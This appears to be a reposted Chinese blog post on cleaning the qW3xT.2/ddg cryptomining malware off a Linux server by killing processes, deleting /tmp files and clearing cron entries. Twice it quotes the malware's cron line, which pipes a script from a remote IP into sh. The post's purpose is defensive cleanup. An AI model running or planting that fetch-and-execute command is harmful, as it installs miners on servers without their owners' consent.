qW3xT.2,解决挖矿病毒。

Posted lvhaosir6

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了qW3xT.2,解决挖矿病毒。相关的知识,希望对你有一定的参考价值。

首先杀死进程:

1.首先,将 CPU 占满的进程杀死
2.它有一个 守护进程 ps -aux|grep ddg

删除文件:

1.进入/tmp文件夹下。发现qW3xT.2文件,删除。
2.删除/tmp目录下的所有的对应ddg

删除计划任务:

[[email protected] tmp]# crontab -l
/15 * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh
删除计划任务 crontab -r

删除脚本:

发现计划任务在服务器中创建了几个文件,
/var/spool/cron/crontabs/root
将root文件删除。
/var/spool/cron/root
内容是/15 * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh。
(与计划任务相同)
将计划任务中创建的文件删除。











以上是关于qW3xT.2,解决挖矿病毒。的主要内容,如果未能解决你的问题,请参考以下文章

linux 服务器被植入ddgsqW3xT.2挖矿病毒处理记录

挖矿病毒

Linux下挖矿病毒解决记录

Weblogic漏洞挖矿病毒解决方法

挖矿病毒 解决思路 xmr

服务器被植入挖矿病毒解决办法